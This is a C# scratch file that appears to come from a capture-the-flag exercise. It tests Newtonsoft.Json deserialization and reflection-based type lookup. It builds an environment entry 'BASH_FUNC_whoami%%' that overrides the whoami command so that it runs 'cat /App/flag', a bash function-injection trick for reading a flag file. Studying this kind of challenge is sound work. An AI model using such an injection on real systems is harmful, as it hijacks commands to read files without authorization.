1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
|
using Newtonsoft.Json;
namespace Program {
class Program {
static Type GetTypeByName(String name) {
return AppDomain.CurrentDomain.GetAssemblies()
.Reverse()
.Select(assembly => assembly.GetType(name))
.FirstOrDefault(t => t != null);
}
public String testfn(Dictionary<String,String> ina) {
Console.WriteLine(this);
return "Testing";
}
static void Main(String[] args) {
// See https://aka.ms/new-console-template for more information
var env = new Dictionary<String, String>();
env.Add("BASH_FUNC_whoami%%", "cat /App/flag");
String serialized = JsonConvert.SerializeObject(env);
Console.WriteLine(">",GetTypeByName("System.Collections.Generic.Dictionary`2[System.String,System.String]"));
Console.WriteLine(">",GetTypeByName("System.Collections.Generic.Dictionary[System.String, System.String]"));
Console.WriteLine(">",GetTypeByName("Dictionary<String,String>"));
Console.WriteLine(">",GetTypeByName("System.Collections.Generic.Dictionary"));
Console.WriteLine(">",GetTypeByName("System.Collections.Generic.Dictionary<System.String,System.String>"));
Console.WriteLine(">",AppDomain.CurrentDomain.GetAssemblies().ToString());
var test = JsonConvert.DeserializeObject(serialized, GetTypeByName("System.Collections.Generic.Dictionary"));
var array = "[" + test + "]";
var test2 = JsonConvert.DeserializeObject<object[]>(array);
var test3 = JsonConvert.DeserializeObject(JsonConvert.SerializeObject(test2), GetTypeByName("Dictionary<String, String>"));
var program = new Program();
program.GetType().GetMethod("testfn").Invoke(program, [test]);
Console.WriteLine(test);
Console.WriteLine(test2);
Console.WriteLine(test3);
Console.WriteLine(serialized);
}
}
}
|
